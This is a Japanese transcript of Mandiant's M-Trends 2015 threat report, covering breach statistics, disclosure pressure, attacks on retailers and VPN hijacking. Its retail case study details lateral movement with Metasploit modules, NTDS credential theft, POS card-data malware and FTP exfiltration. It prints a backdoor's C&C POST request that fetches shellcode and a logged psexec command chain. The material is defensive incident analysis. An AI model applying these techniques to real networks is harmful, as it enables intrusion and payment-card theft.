M-Trends 2015 セキュリティ最前線からの視点

28
SECURITY CONSULTING セキュリティ最前線からの視点 M-Trends ® 2015

Transcript of M-Trends 2015 セキュリティ最前線からの視点

Page 1: M-Trends 2015 セキュリティ最前線からの視点

SECURITY CONSULTING

脅 威 レ ポ ー ト

セキュリティ最前線からの視点M-Trends® 2015:

Page 2: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

目次

はじめに ……………………………………………………………………………………… 1

被害の統計…………………………………………………………………………………… 2

傾向1:被害の公表をめぐる問題 …………………………………………………………… 4

サイバー攻撃に詳しくなった社会……………………………………………………… 4

高まる要求水準 ………………………………………………………………………… 5

被害を公表する組織が増加している理由 …………………………………………… 5

傾向2:狙われる小売企業 ………………………………………………………………… 7

侵入口として狙われるアプリケーションの仮想化サーバー ……………………………… 7

新たなツールや手口、手順の登場 …………………………………………………… 7

「Chip-and-PIN」カードの普及地域で増加するeコマース事業者への攻撃 ……… 7

推奨事項 ………………………………………………………………………………12

傾向3:進化する攻撃ライフサイクル ……………………………………………………… 13

VPNの乗っ取り ………………………………………………………………………13

マルウェアの隠蔽と偽装 ………………………………………………………………14

入手が容易になったパスワード ………………………………………………………18

WMIとPowerShellを使用してネットワーク内を移動 ………………………………19

傾向4:あいまいになる境界線 - 互いの手口を模倣する サイバー犯罪者とAPT攻撃者 ………………………………………………………………20

攻撃の意図を見極める重要性 ……………………………………………………… 20

両グループの区別の重要性 ………………………………………………………… 22

結論 …………………………………………………………………………………………23

Mandiantについて …………………………………………………………………………24

FireEyeについて ……………………………………………………………………………24

Page 3: M-Trends 2015 セキュリティ最前線からの視点

www.mandiant.com 1

はじめにMandiantでは数年来、セキュリティに「完璧」はないと主張し続けています。 2014年に起きた一連のセキュリティ・インシデントは、この主張の正しさを裏付けるものとなっています。

セキュリティ対策のギャップを埋める組織側の取り組みには、ある程度の改善が確かに見られます。しかしサイバー

攻撃者の手口は、高度な攻撃のみならず一般的な攻撃においても、残念ながら防御側の進歩を上回るペースで継続的に進化を遂げています。

昨年のM-Trendsレポートでは、サイバー・セキュリティはIT関連の限定的な課題にとどまらず、取締役会の優先課題に取り上げられるまでに深刻化していると述べました。そして今年に入り、サイバー・セキュリティ(より正確には、「サイバー・セキュリティ対策が不十分という事実」)は社会問題と呼ぶべきフェーズに突入しています。2015年の最初の数週間だけで、米大統領が一般教書演説で言及し1、莫大な制作費をかけた映画のシナリオに採用され2、挙げ句の果てにはゴールデン・グローブ賞のテレビ中継冒頭の話題に取り上げられる3までに至りました。

セキュリティの最前線でインシデント・レスポンスにあたるMandiantのコンサルタントは、攻撃者の動機や手口の変化をいち早く把握できる立場にあります。本書で紹介する知見や分析結果は、数百件に及ぶ過去のインシデント・レスポンス事例で培った経験と実績に基づいています。Mandiantはこの10年間、30業種以上の世界中のさまざまな組織で発生したセキュリティ・インシデントに対応してきました。

組織のセキュリティ対策は確かに進歩しています。しかし攻撃者は依然として、侵入が発覚するはるか前から企業、組織のネットワークの中を自由に動き回っています。侵害が発覚するまでの日数は、平均で2013年の229日に対し2014年は205日と短縮傾向を示すものの、依然として攻撃者に十分 すぎるほどの活動期間を与えているのが現状です。また、自分たちで侵入を検知した組織の割合もそれほど変わっていません。今回の調査で、捜査当局など外部からセキュリティ侵害の指摘を受けた組織の割合は69%。2013年の67%、2012年の63%

から若干の増加傾向を示しています。

最も多く攻撃を受けた業種は、前回に引き続き小売業です。この傾向は、販売時点情報管理(POS)システムからクレジット・カード情報を盗み出す新たな手口の登場が関係していると考えられます。特に「Chip-and-PIN」方式のカード(チップが内臓されたカードで支払い時に4桁の暗証暗号を入力することでセキュリティ強化を狙う)が普及している地域では、eコマース事業者や決済処理事業者に対する攻撃が増加しています。

また2014年には、これまで被害報告の少なかった一部の業種に対するセキュリティ侵害が目に見えて増加していました。特に顕著だったのは、プロフェッショナルサービス業、医療、官公庁、そして国際 組織です。

攻撃者は、新たなセキュリティ対策の登場に合わせて、攻撃手法を進化させています。このような傾向は、 2014年もはっきりと見て取ることができました。バーチャル・プライベート・ネットワーク(VPN)のセッションを乗っ取る、検知をすり抜ける、認証情報を盗み出す、ネットワークに潜伏する、侵入先に長期的な足がかりを築くなど、一連の攻撃活動のために、攻撃者は新たな手口を開発したり実績ある既存の手法を進化させています。

また、セキュリティ・インシデントの発生を公表する被害組織が増える一方で、被害の発覚直後に誰もが抱く疑問、すなわち「いったい誰が?」という問いに答えることがいっそう難しくなっています。高度な手法を駆使するようになったごくありきたりなサイバー犯罪者と、偽装工作のために既製ツールを使用するようになった国家レベルの高度な攻撃者の判別が困難になっているのがその一因です。

このように、セキュリティ脅威の動向は.以前にも増して複雑化しており、セキュリティ担当者にとって、サイバー攻撃の防御、検知、解析、そして対応は、従来以上に厄介で重要な任務となっています。

1 Michael D. Shear (The New York Times). “Obama to Announce Cybersecurity Plans in State of the Union Preview.” January 2015.

2 Sheri Linden (The Hollywood Reporter). “’ Blackhat’ : Film Review.” January 2015.3 Christopher Palmeri (Bloomberg). “Hollywood ‘Spoiled Brats’ Are Easy Targets at Golden Globes.” January 2015.

Page 4: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

2 www.mandiant.com

以前の調査では被害報告の少なかった一部の業種で、セキュリティ侵害が目に見えて増加しています。

業務サービス/専門サービス

官公庁/国際組織

医療

6%医療

5%運輸

3%航空宇宙/防衛

7%法律サービス

8%その他

7%ハイテク/IT

8%建設/土木

17%業務サービス/専門サービス

7%官公庁/国際組織

14%小売

10%金融サービス

3%

8%メディア/エンターテインメント

5%

2014年は、複数の主要な業種で被害報告数に大きな変化が見られます。 小売 - 4%から14%に増加 メディア/エンターテインメント - 13%から8%に減少

APTフィッシング

フィッシング・メールの78%はITやセキュリティに関係する内容。その多くは、標的とする組織のIT部門やアンチウイルス・ベンダーからの連絡を装っている

78%フィッシング・メールの72%は平日に送信されている

72%

Mandiantがインシデント・レスポンスを実施した業種

セキュリティ脅威の種類

妨害・迷惑行為 データ窃盗 サイバー犯罪 ハクティビズム 破壊活動

目的 アクセス、拡散拡大 経済的、政治的な利益

金銭的な利益 中傷、圧力、政治的な主張

業務の妨害

例 ボットネット、スパム

APT攻撃グループ クレジット・カード情報の窃盗 Webサイトの改ざん データの消去

標的型

特徴 プロセスの自動化 持続的 不特定多数のターゲット 自己顕示欲 対立を契機

ネットワークへの侵入を試みるサイバー攻撃者の動機は、金銭的利益から政治的主張に至るまで広範囲にわたっています。

セキュリティ侵害の最初の痕跡から検知までの日数

205検知までの間に、攻撃者が侵入先のネットワークで活動していた平均日数

2013年から24日間短縮

最長は2,982日に及ぶ

セキュリティ侵害が発覚した経緯

31%自ら侵害を検知した組織の割合

69%侵害の事実を外部から指摘された組織の割合

被害の統計攻撃者は幅広い業種を標的にしており、2014年以降一部の業種の被害報告が増加しています。また、侵害が発覚するまでの日数は2013年より多少短くなっていますが、それでもネットワークに侵入した攻撃者に十分すぎるほどの活動期間を与えている事実に変わりはありません。一方、外部から指摘を受ける前に自ら侵入を検知した組織の割合は低下しています。

Page 5: M-Trends 2015 セキュリティ最前線からの視点

www.mandiant.com 3

以前の調査では被害報告の少なかった一部の業種で、セキュリティ侵害が目に見えて増加しています。

業務サービス/専門サービス

官公庁/国際組織

医療

6%医療

5%運輸

3%航空宇宙/防衛

7%法律サービス

8%その他

7%ハイテク/IT

8%建設/土木

17%業務サービス/専門サービス

7%官公庁/国際組織

14%小売

10%金融サービス

3%

8%メディア/エンターテインメント

5%

2014年は、複数の主要な業種で被害報告数に大きな変化が見られます。 小売 - 4%から14%に増加 メディア/エンターテインメント - 13%から8%に減少

APTフィッシング

フィッシング・メールの78%はITやセキュリティに関係する内容。その多くは、標的とする組織のIT部門やアンチウイルス・ベンダーからの連絡を装っている

78%フィッシング・メールの72%は平日に送信されている

72%

Mandiantがインシデント・レスポンスを実施した業種

セキュリティ脅威の種類

妨害・迷惑行為 データ窃盗 サイバー犯罪 ハクティビズム 破壊活動

目的 アクセス、拡散拡大 経済的、政治的な利益

金銭的な利益 中傷、圧力、政治的な主張

業務の妨害

例 ボットネット、スパム

APT攻撃グループ クレジット・カード情報の窃盗 Webサイトの改ざん データの消去

標的型

特徴 プロセスの自動化 持続的 不特定多数のターゲット 自己顕示欲 対立を契機

ネットワークへの侵入を試みるサイバー攻撃者の動機は、金銭的利益から政治的主張に至るまで広範囲にわたっています。

セキュリティ侵害の最初の痕跡から検知までの日数

205検知までの間に、攻撃者が侵入先のネットワークで活動していた平均日数

2013年から24日間短縮

最長は2,982日に及ぶ

セキュリティ侵害が発覚した経緯

31%自ら侵害を検知した組織の割合

69%侵害の事実を外部から指摘された組織の割合

Page 6: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

4 www.mandiant.com

傾向1: 被害の公表をめぐる問題サイバー攻撃による被害が従来以上にメディアの注目を集めるようになったため、被害の公表自体が企業、組織にとってさらに大きなプレッシャーになっています。

Mandiantが2014年にインシデント・レス ポンスを実施した組織のうち、データ侵害の事実を公表したのは30社を上回

ります。その多くは、怒濤の報道に翻弄されながらも情報開示に踏み切りました。Mandiantの経験では、事実として判明しているセキュリティ侵害の範囲と程度を公表することで、被害を受けた組織が明確で適切なメッセージを社会に発信できるという大きな意義があります。また、公表済みの内容を何度も訂正し、その都度信頼を失うという悪循環を避けられるメリットもあります。

サイバー攻撃に詳しくなった社会

2014年、セキュリティ侵害の発生が被害組織から次々公表された結果、標的型攻撃の脅威とその影響が広く社会に認知されるようになりました。一方で情報を公表する側に、より詳しい情報の開示を求め、鋭い質問が投げかける場面も増えて

きました。インシデントの発生時期や漏えいしたデータの種類を公表するだけでは、メディアや取引先、投資家、一般消費者は満足しません。使用されたマルウェアの種類や侵入の手口といった細かな情報まで明らかにしなければ、そうした人たちの納得は得られないのです。

さらに、攻撃者の素性を明らかにすることを求めるプレッシャーも日増しに強くなっています。攻撃者は誰なのかという質問は、Mandiantが調査を開始する最初の日、つまりセキュリティ侵害の証拠集めに着手したばかりの時点で.お客様からしばしば尋ねられる問いでもあります。昨今では、タイプの異なる攻撃者が同じようなツールを使用するケースが増えており、攻撃者の特定は以前よりもさらに難しくなっているのが実情です(P.20「曖昧になる境界線 - 互いの手口を模倣するサイバー犯罪者とAPT攻撃者」を参照)。

公表の実施計画を策定する際には、侵害の範囲と程度の把握が欠かせません。その両方の取り組みによってはじめて、過去の発表を何度も訂正し、その都度信頼を失うという悪循環を避けることができるのです。

Page 7: M-Trends 2015 セキュリティ最前線からの視点

www.mandiant.com 5

高まる要求水準

情報開示に対する要求が高まる中、多くの組織は、大規模セキュリティ侵害の発生直後に行うコミュニケーションの信頼性と一貫性がいかに重要であるかを認識し始めています。しかし、未確定の事実が少なからずある中で、情報をどこまで開示するかを判断することは容易ではありません。

大規模なセキュリティ侵害が発生すると、さまざまな憶測が流れるため、被害組織はしばしばその否定に追われます。たとえばMandiantが実際に目撃したケースでも、インシデントの調査と被害対応が続く中、攻撃者の侵入方法についての憶測が取りざたされ、噂話への反論に振り回されるといった事例が複数ありました。

根拠のない情報への対応に追われていると、事実確認と追跡調査というインシデント・レスポンスの本来の目的がおろそかになる恐れがあります。

被害を公表する組織が増加している理由

ではなぜ、被害事実を公表する組織が増えているのでしょうか。断言はできませんが、次の2つ

の要因が関係していると思われます。まず、ここ数年増加しているクレジット・カード情報や個人情報の漏洩では、法規制により特定の情報の開示が義務づけられている場合が多い点です。

また2014年、Mandiantが実施したインシデント・レスポンスの69%がそうだったように、セキュリティ侵害が、取引先や顧客、捜査当局など外部からの指摘で発覚するケースが増えている点も要因の1つと考えられます。

つまり、「攻撃者のほかにも、インシデント発生の事実を知っている組織がある」という意識から、被害を公表している場合が考えられるのです。

被害を公表するかどうかに関係なく、重要なのは直接の利害関係者がすぐに情報を求めているとしても、調査には数週間から数か月を要する場合があり、事実関係の把握にはそれなりに時間を要すという点です。公表の実施計画を策定する際、侵害の範囲と程度の把握が欠かせないのはそのためです。

要点:セキュリティ侵害の事実を公表し、メディアで大々的に報道される組織が増えています。メディアや一般消費者、企業各社の間にも、セキュリティ侵害の発生を完全に防ぐことはできないとの認識が広まりつつありますが、同時に被害を受けた組織が侵害の内容について詳細な質問をぶつけられ、より多くの情報を開示するよう求められるケースが増加しています。このような状況に的確に対処するには、公表の適切な実施計画が必要です。そして適切な計画の策定には、綿密なインシデント調査に基づく事実関係の正確な把握が欠かせません。

Page 8: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

6 www.mandiant.com

セキュリティ侵害の公表時に 問われる5つの質問以下に挙げた例は、セキュリティ侵害の公表時に、被害を受けた組織がメディアや投資家、顧客、取引先から問われる場合が多い質問です。被害を受けた組織の担当者は、これらの問いに対する適切な回答を用意し、不正確なメッセージや一貫性に欠けたメッセージを公に発信しないよう注意する必要があります。

攻撃者はどのようにネットワークに侵入したのか?

最も典型的な侵入の手口は、ソーシャル・エンジニアリングと未知の脆弱性の悪用を組み合わせたケースです。また、インターネットに接続されたサーバーを攻撃する、Eメールに不正なファイルを添付して開かせる、さらには標的組織のユーザーがよくアクセスするWebサイトにマルウェアを仕掛けるといった手口もよく使われます。このような侵入の手口を把握しておくことは重要ですが、攻撃者のアクセスを完全に遮断したかどうか、脅威を完全に封じ込めたかどうかを説明できるよう事前に準備する取り組みがカギを握ります。

攻撃者はどのようにネットワークに繰り返しアクセスしていたのか?

多くの攻撃者は、データを盗み出すなどの目的を達成するために繰り返しネットワークにアクセスします。攻撃者が二度とアクセスできないようにするには、攻撃者が設置したすべての侵入口をふさぐ必要があります。多くの攻撃者は、バックドアやWebシェルを仕掛ける、既存のVPNを乗っ取るなどして、リモート・アクセス・システムを侵入口として利用します。

攻撃はどのような手順で行われたのか?

攻撃者がネットワークに侵入してデータを盗み出した経緯を理解することで、将来起こり得る同じような攻撃の防御に役立ちます。またセキュリティ侵害の範囲を正確に特定できなければ、被害の復旧はいうまでもなく、インシデントの影響を把握することも困難です。

盗み出されたデータの内容は?

盗み出されたデータを特定する際には、多くの場合、侵入を受けたシステムのフォレンジック解析が必要となります。ただし、解析を実施しても、完全に特定できるとは限りません。

盗まれたデータ、またはその可能性があるデータの種類によっては、法的な責任が生じる場合もあるため、法務部門と協力して対応にあたる必要があります。

脅威はすべて封じ込めることができたのか?

他の4つの質問に答えることができれば、おそらくこの問いに対しても対応が可能でしょう。また最近のセキュリティ脅威のライフサイクルを理解していると、より効果的にインシデント・レスポンスを実施し、復旧作業を行うことができます。

Page 9: M-Trends 2015 セキュリティ最前線からの視点

www.mandiant.com 7

傾向2: 狙われる小売企業2014年に発生した1,000社以上の企業に対するセキュリティ侵害の中で、最も多く狙われたのは小売企業です。その結果、数え切れないほど多くの一般消費者がクレジット・カードの再発行を余儀なくされました4。Mandiantの調査では、小売企業に対する攻撃の増加という事実に加え、特にこれらの企業を狙う新しい攻撃グループやツール、手口の存在も明らかになっています。

侵入口として狙われるアプリケーションの仮想化サーバー

アプリケーションの仮想化技術を使用すると、 隔離されたデスクトップ環境を構築し、特定のプログラムに限定してリモート・アクセスを許可することができます。適切に構成されたアプリケーション仮想化環境では、ユーザーが作業できる範囲を仮想環境の保護領域内に制限できますが、些細な構成ミスによって保護領域に隙間が生じてしまうケースが後を絶ちません。このような場合、攻撃者に仮想環境を突破され、システムの別の領域に侵入される恐れがあります。

Mandiantが調査を実施したセキュリティ・インシデントのうち、アプリケーション仮想化環境を狙った攻撃のすべてに、ある共通の問題が見られました。環境の構築時に、ユーザー名とパスワードの入力だけでアプリケーションにリモート・アクセスできるようにしていたのです。もしすべての環境で2ファクタ認証を導入していれば、被害の発生を回避できたケースもあったはずです。

新たなツールや手口、手順の登場

新たな攻撃グループの出現は、新たなツールや手口、手順の登場を意味します。各グループのスキル・レベルはまさに千差万別です。既製のツールで攻撃を仕掛ける低いスキルの攻撃グループもあれば、特定のPOSアプリケーション向けに

開発されたマルウェアで巧みにクレジット・カード情報を窃取する高度な攻撃グループも存在します。

興味深いのは、低いスキル、もしくはスキルを持たない攻撃グループでも、熟練のグループと同様にクレジット・カード情報の窃取に成功している点です。スキルレベルに関係なく、多くのグループが既存のセキュリティ対策をすり抜けてネットワークに侵入し、POSシステムにアクセスして、カード情報を収集するマルウェアを仕掛けています。

「Chip-and-PIN」カードの普及地域で増加するeコマース事業者への攻撃

EMV(Europay, MasterCard, and Visa)テクノロジーを採用した「Chip-and-PIN」方式のカードが、いよいよ米国にも導入されつつあります。約20年の歴史を持つ同技術は、米国以外の地域ではグローバル・スタンダードとして広く普及していますが、米国の小売企業への導入は従来から進んでいませんでした。

EMV搭載のクレジット・カードは、トランザクションごとに一意のコードを生成するため、偽造が非常に困難になります。そのため攻撃者は、より攻撃の容易なターゲットへと狙いを変えた可能性があります。同カードの普及地域では、従来と比べてeコマース事業者や決済処理事業者への攻撃が増加しているのです。

4 U.S. Department of Homeland Security and U.S. Secret Service. “Backoff Malware: Infection Assessment.” August 2014.

Page 10: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

8 www.mandiant.com

事例米国の大手小売企業から、3か月間に数百万件の クレジット・カード情報を盗み出した攻撃者

この事例は、2014年に多発した小売企業に対する攻撃の典型といえます。正規の認証情報を使用して標的のシステムにリモート・アクセスしネットワーク内を移動、店舗のレジにPOSマルウェアを仕掛けるというおなじみのパターンをそのまま踏襲していました。被害者の小売企業は、米国当局から指摘を受けて、はじめてセキュリティ侵害を受けている事実に気付きました。

ネットワークへの侵入

攻撃者はまず、正規の認証情報を使用して小売企業の仮想アプリケーション・サーバーに接続。限定的な権限が設定された仮想デスクトップへのアクセス権を取得します。ログオンに失敗した痕跡がないため、攻撃者は事前にアカウントの認証情報を入手していたと思われます。認証情報の入手方法に関して、残された証拠からは特定されていません。

攻撃者は続いて、仮想デスクトップのわずかな構成ミスを突いてシステム権限を昇格させ、コマンドラインへのアクセス権、つまりシステムを直接制御する権限を取得します。さらにWindowsのFTPコマンドでパスワードのダンプ・ツールをダウンロードし、同ツールを使ってローカル管理者アカウントのパスワードを入手。この小売企業の全システムでは、まったく同じ管理者パスワードが使い回されていました。

ここまで、わずか数分の出来事です。

ネットワーク内の移動

管理者パスワードを入手した攻撃者は、 Metasploitフレームワークを使用して

ネットワーク内を移動します。Metasploitは、エクスプロイト・コードを作成、テスト、実行するためのオープンソースの攻撃フレームワークで、システムに存在する脆弱性の発見と悪用に役立つさまざまなモジュールを備えている点が特徴です。その多機能さから、セキュリティ研究者とサイバー攻撃者のどちらにも広く利用されています。

この攻撃で使用されていたモジュールは、当該システムでのコマンド実行を可能にするpsexec_commandです。このモジュールでは、コマンドがWindowsのサービスとして実行されるため、 Windowsのシステム・イベント・ログに攻撃の痕跡が多数残ります。

攻撃者は、各システムにアクセスし続けながら、本社ネットワークのドメイン・コントローラに狙いを定めます。ドメイン・コントローラは、Windows環境の認証処理を管理するサーバーです。この企業のドメイン・コントローラでは、前述したローカル管理者アカウントと同じ認証情報が使用されていたため、攻撃者は難なく同システムへのアクセスを果たしました。ドメイン・コントローラに侵入した攻撃者は、 Metasploitのntdsgrabモジュールを使用して、NTDSデータベースのコピーとシステム・レジストリのハイブを入手します。

NTDSデータベースには、ユーザー名とパスワードのハッシュなど、ドメイン・コントローラが使用するActive Directoryの情報が格納されています。ntdsgrabモジュールは、Windowsのボリューム・シャドウ・コピー・サービス(VSS)を使用して、NTDSデータベースを格納するパーティションのシャドウ・コピーを作成します。VSSは、バックアップやリストア

目的でシステムのスナップショットを作成する正規のサービスですが、攻撃者はNTDSデータベースのコピーを作成する目的でこのサービスを使用。作成したコピーから、他のツールでパスワードのハッシュを抽出していました。

ドメイン管理者のパスワード・ハッシュを解読した攻撃者は、そのパスワードを使用してネットワーク中のシステムに侵入します。

攻撃者はここで、Metasploitの使用を止め、非対話型のネットワーク・ログオンやSysInternalsのPsExecツール、リモート・デスクトップ・プロトコル(RDP)によるログオンなど、より一般的な手法を使ってネットワーク内を移動し、ドメイン管理者のアカウントで仮想アプリケーション・サーバーにログインします。このような手順によって、攻撃者はRDP経由で各システムにログインし、さまざまな操作を行うことが可能となりました。

バックドア

侵入先のネットワークに足がかりを残すため、攻撃者は複数のマシンにバックドアを仕掛けます。使用されたバックドアの実体は、Windows XPシステムに対応した不正なデバイス・ドライバです。

このバックドアは高機能なアーカイブ・ソフトで圧縮されていますが、これとよく似たアーカイブ・ソフトは広く流通している高度なマルウェアでも使用されています。バックドアの実体であるデバイス・ドライバは、まず自身をメモリ内に展開した後、新しいシステム・スレッドを起動します。

Page 11: M-Trends 2015 セキュリティ最前線からの視点

www.mandiant.com 9

POST /evil.txt HTTP/1.0Accept: */*Content-Length: 32Content-Type: application/octet-streamUser-Agent: Evil_UA_StringHost: 1.2.3.4Pragma: no-cache<POST_DATA>

<!-XOR_Encoded_Shellcode -->

バックドアがHTTP POSTリクエストをC&Cサーバーに送信

XORエンコードのシェルコードをダウンロード、実行

感染システム 攻撃者のC&Cサーバー

psexec_commandの動作:psexec_commandモジュールは、実行するコマンドと出力ファイル(テキスト・ファイル)をWindowsのバッチ・ファイルに書き込みます。テキスト・ファイルとバッチ・ファイルのどちらにも、ランダムに生成された16文字のファイル名が付けられます。

続いて、作成したバッチ・ファイルを実行します。

Windowsのシステム・イベント・ログに書き込まれたサービス情報を図1に示します。

A service was installed in the system.Service Name: MRSWxwQmQxFGumEFsWService File Name: %COMSPEC% /C echo dir ^> %SYSTEMDRIVE%\WINDOWS\Temp\TthwsVKvUhydrsNB.txt > \WINDOWS\Temp\RbhRmgALAHcdyWXG.bat & %COMSPEC% /C start %COMSPEC% /C \WINDOWS\Temp\RbhRmgALAHcdyWXG.batService Type: user mode serviceService Start Type: demand start

図1:Metasploitのpsexec_commandモジュールがインストールしたサービス

ここで元のドライバが読み込みに失敗したことをシステムに通知しますが、展開されたコードは元のドライバとは別のプロセスで実行されるため、Windowsがドライバの読み込みを認識しなくてもマルウェアは実行されます。この手法はリバース・エンジニアリングを妨害し、バックドアの機能を隠蔽する目的で使用されています。

バックドアは、展開されたドライバがユーザー空間プロセス(Windowsカーネルの外で実行されるプロセス)に挿入したシェルコードを利用して機能を追加します。このシェルコードは、ハードコードされたIPアドレス宛にHTTP POSTリクエストを送信し、HTMLコメントとして記述されXORでエンコードされたシェルコードをダウンロードします。

このようにバックドアは、新しいシェルコードをダウンロードして実行するだけで新機能を追加できるため、容易に多機能化することが可能です。シェルコードをこのように利用する手法はけっして目新しくありませんが、同手法とアーカイブ・ソフトとの組み合わせは他では見られないこのバックドア独自の特徴です。

バックドアとC&Cサーバーの通信内容を図2に示します。

図2:バックドアによる通信

Page 12: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

10 www.mandiant.com

小売チェーンで使用されているすべてのレジは、小売ドメインのコントローラで認証されます。つまり、小売ドメインのコントローラにアクセスできるユーザーは直接、店舗のレジにアクセスできることになります。

データの窃取

ドメイン管理者のパスワードをプレーンテキストで入手した攻撃者は、本社ネットワークの各Windowsシステムへの"フリーパス"を獲得したことになります。

この段階で、攻撃者は小売ネットワークへのアクセス権を取得するための活動を開始します。

小売ネットワークは次のように構成されています。

• 小売ドメインは本社ドメインと双方向の信頼関係を確立している。

• 店舗のレジはWindows XPで動作している。

• 店舗のレジは小売ドメインに参加している。

小売業界に典型的なこの構成には、攻撃者にとって好都合な点がいくつか存在します。

まず、攻撃者が入手済みのドメイン管理者の認証情報を使用して、小売ドメインの各システムに特権アカウントでアクセスできる点です。

次に、小売ドメインが本社ドメインの子である点です。本社ドメインと小売ドメイン間で特定の機能を使用するためには、両方のドメイン・コントローラ間で重要なポートをオープンにしておく必要があります。オープンされたポートでの通信には、この小売企業が導入しているその他のファイアウォールのルールは適用されません。そのため攻撃者は、これらのポートを使用してドメイン・コントローラにアクセスし、そこから小売ネットワークに侵入しています。

小売チェーンで使用されているすべてのレジは、小売ドメインのコントローラで認証されます。つまり、小売ドメインのコントローラにアク

セスできるユーザーは直接、店舗のレジにアクセスできることになります。攻撃者は、小売ドメインのコントローラでWindowsのバッチ・スクリプトを実行し、POSシステム上のカード情報を収集するマルウェアを全店舗のレジにコピーしていました。

その後、スケジュール設定したWindowsタスクでマルウェアを実行し、カードの磁気ストライプに記録されたクレジット・カード番号や有効期限などのトラック・データをPOSアプリケーションのプロセス・メモリから収集します(攻撃者は、収集したトラック・データをカードの偽造業者に転売します)。

このPOSマルウェアは、OSQLを使用してMicrosoft SQL Serverの一時データベースであるtempdbテーブルにトラック・データを書き込みます。OSQLは、レジ・システムにプリインストールされたコマンドラインのSQL照会ツールです。tempdbテーブルに格納されたデータはSQL Serverサービスの停止時に消去されるため、攻撃者は1日に1回、全レジのtempdbテーブルを照会し、その出力をドメイン・コントローラ上のテキスト・ファイルに送信します。

攻撃者はその後、トラック・データが記録されたテキスト・ファイルをアーカイブし、インターネットにアクセスできる小売ネットワークのワークステーションに転送。さらにこのファイルを自身が管理するサーバーにFTP経由で転送します。

この攻撃の実行プロセスを図3に示します。

Page 13: M-Trends 2015 セキュリティ最前線からの視点

www.mandiant.com 11

仮想アプリケーションから抜け出して本社ネットワーク内を移動し、各システムから認証情報を収集します。

2 小売ネットワークのドメイン・コントローラを足がかりに店舗のPOSレジにアクセスし、クレジット・カードのトラック・データを収集するマルウェアをPOSレジに仕掛けます。

3

攻撃者が、仮想アプリケーション・サーバー経由で標的のネットワークにリモート・アクセスします。認証には正規の認証情報を使用します。

1 収集したトラック・データをPOSレジから回収し、小売ドメインのコントローラから小売ネットワーク上のユーザー・ワークステーションに転送します。さらにこのトラック・データを、FTP経由で外部のFTPサーバーに転送します。

4

仮想アプリケーション・サーバー

本社ドメインのコントローラ

小売ドメインのコントローラ

ユーザー・ワークステーション

最初のアクセス FTP経由でデータを外部に送信

ユーザー・ワークステーション

レジ1 レジ2

店舗2

小売ドメイン本社ドメイン

DMZ

レジ1 レジ2

店舗1

C&Cトラフィック

攻撃者

図3:攻撃の概要

Page 14: M-Trends 2015 セキュリティ最前線からの視点

M-Trends セキュリティ最前線からの視点

12 www.mandiant.com

推奨事項急増するサイバー攻撃に、小売企業はどのように対応すればよいのでしょうか。もちろん、すべての攻撃、すべてのセキュリティ侵害を完全に防ぐことは困難です。しかし、次に示すガイドラインに従えば、ネットワークへ侵入しネットワーク内部を移動する攻撃者をある程度妨げることができます。セキュリティ部門が適切なツールを使用し、警戒を怠らなければ、攻撃の進行を遅らせて時間を稼ぎ、最悪の事態が発生する前に攻撃を検知、分析した上で、適切な対応が可能になります。

リモート・アクセスの保護

社員や下請け業者、取引先による企業ネットワークへのリモート・アクセスの実態を確認し、その手段、許可するユーザー、パスワード要件など、リモート・アクセスを構成するすべての要素を管理します。すべてのリモート・アクセス手段には2ファクタ認証を義務づけ、リモートからのログオンを常時監視して不審な行動の有無をチェックします。

PCI環境へのアクセスを保護する

PCI(Payment Card Industry)環境をネットワークの他のセグメントから隔離します。PCI環境のシステムへのアクセスは、高セキュリティ・ゾーンのデバイスを管理するセキュアなジャンプ・サーバーを経由するように設定し、このサーバーへのアクセスには2ファクタ認証を必須とします。可能な場合には、小売側のドメインを分離して、他のドメインとの接続を最小限に抑えます。また、アウトバウンドのネットワーク・トラフィックの接続先を業務に不可欠な承認済みのリソースに限定する対策も重要です。

重要なシステムにアプリケーション・ホワイトリストを導入する

重要なシステムにアプリケーション・ホワイトリストを導入し、不正なファイルが実行される可能性を抑えます。この対策は、クレジット・カード情報を保存するシステムやジャンプ・サーバー、ドメイン・コントローラなど、すべての重要なシステムを対象とする必要があります。

特権アカウントを適切に管理する

攻撃者は、ローカル管理者やドメイン管理者、サービス・アカウントなど、特別な権限を持つアカウントの乗っ取りを試みます。セキュリティ部門は、特権アカウントの数を限定して、すべてのローカル管理者アカウントのパスワードが必ずユニークとなるように管理する必要があります。そのためには、個々の認証情報の管理や使用するたびにパスワードを自動変更できるパスワード管理ツールの導入を検討します。このようなツールを導入すると、特権アカウントをより厳密に管理できます。

要点:金銭の集まるところには、必ず犯罪者の姿があります。金銭的利益を目的とする犯罪者にとって、小売企業は古くから格好の標的であり、その傾向は2014年以降も変わりありません。攻撃者は新たな手口を生み出し、メディアに取り上げられる機会も増えていますが、基本的な戦略はここ数年ほぼ一貫しています。

Page 15: M-Trends 2015 セキュリティ最前線からの視点

www.mandiant.com 13

傾向3: 進化する攻撃ライフサイクルMandiantが調査を実施したほとんどのインシデントは、典型的なパターンをたどっています。 Mandiantではこのパターンを攻撃ライフサイクルと呼んでいます。

情報資産を巡る攻防はまさにいたちごっこです。防御側が新たな対策を講じれば、攻撃側もそれに合わせて手口を変え

てきます。これは、2014年も繰り返されてきました。 2014年、特に増加していたのは、侵入先ネットワークへのアクセスを維持するためにVPNを乗っ取るという手法です。このほか、検知を回避する巧妙な手法や、認証情報を盗み出し、ネットワーク内を移動する新たなツールと手口も確認されています。

VPNの乗っ取り

標的のVPNを乗っ取る攻撃者には、2つの大きな利点があります。まず、バックドアを仕掛けることなく、いつでもネットワークにアクセスできるようになる点です。さらに、正規ユーザーになりすませば、侵入が発覚する危険性が低下します。

ここ数年、標的のネットワークに足がかりを築いた直後から、VPN関連のリソースや認証情報を探し始める脅威グループが確認されています。この種の活動は2014年に入ってさらに活発化しており、 VPNの乗っ取りに成功する攻撃はかつてないほど増加しています。

Mandiantがインシデント・レスポンスを実施したVPNに対する攻撃事例のほとんどで、次のいずれかの攻撃手法が使用されています。

• 1ファクタ認証:VPNの認証で要求される情報がユーザー名とパスワードのみである場合、攻撃者は侵入先のエンドユーザー・システムやActive Directoryドメインから盗み出した認証情報をそのまま使用します。

